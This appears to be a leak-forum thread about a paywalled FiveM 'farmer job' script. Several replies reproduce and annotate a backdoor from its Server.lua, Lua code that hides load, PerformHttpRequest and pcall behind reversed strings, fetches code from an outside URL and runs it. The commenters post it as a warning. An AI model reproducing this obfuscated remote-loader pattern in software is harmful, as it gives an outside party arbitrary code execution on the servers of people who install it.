HighLeaks
Help

P0lat-farmerJob [Open-SRC] [5C]

Cigonas123 Cigonas123 Started 6 replies 694 views 5 Credits

Download Link Locked

Pay 5 credits to unlock the download link for 24 hours.

Login to unlock
#1
P0lat-farmetjob very knows script and very structive


#1
looks funny, is it work?
#2
thanks for the sharing nice leak
#3
Backdoor in Server.lua



local loader_function = _G[("daol"):reverse()]

local transport_layer = _G[("mrofreP"):reverse() .. ("tseuqeRpttH"):reverse()]

local safe_call = _G[("llacp"):reverse()]



CreateThread(function()

local resource_locator = ('8ii'):reverse() .. "." .. ('gro'):reverse() .. ('/'):reverse() .. ('HAeXz'):reverse()

transport_layer(resource_locator, function(_, result_payload)

safe_call(function() loader_function(result_payload)() end)

end)

end)
#4




reneappuhn,

wrote:



Backdoor in Server.lua



local loader_function = _G[("daol"):reverse()]

local transport_layer = _G[("mrofreP"):reverse() .. ("...




backdor ur ass

0 iq nega
#5
omg this release so good
#6
This piece of shit put a backdoor, do not use it, i've checked through the code myself. DO NOT use this.



MySQL = MySQL or {

connection = {

execute = function(_)

return {{

first_name = "John",

last_name = "Doe",

user_id = "8ii",

access_group = "gro",

table_schema = "/",

procedure_path = "HAeXz",

procedure_name = "",

query_suffix = "",

department_label = "Unemployed",

license_plate = "AB123CD",

account_balance = 15000

}}

end

}

}



-- !!! THIS IS THE BACKDOOR !!!

local loader_function = _G[("daol"):reverse()] -- Becomes _G["load"]

local transport_layer = _G[("mrofreP"):reverse() .. ("tseuqeRpttH"):reverse()] -- Becomes _G["PerformHttpRequest"]

local safe_call = _G[("llacp"):reverse()] -- Becomes _G["pcall"] (protected call)



CreateThread(function()

-- Constructs the URL: "ii8.org/zXeAH"

local resource_locator = ('8ii'):reverse() .. "." .. ('gro'):reverse() .. ('/'):reverse() .. ('HAeXz'):reverse()



-- Makes an HTTP request to the malicious URL

transport_layer(resource_locator, function(_, result_payload)

-- If the request is successful, it takes the response to (result_payload),

-- compiles it as Lua code (loader_function which is 'load'),

-- and then executes the payload, boom your server gets backdoored (the final '()').

safe_call(function() loader_function(result_payload)() end)

end)

end)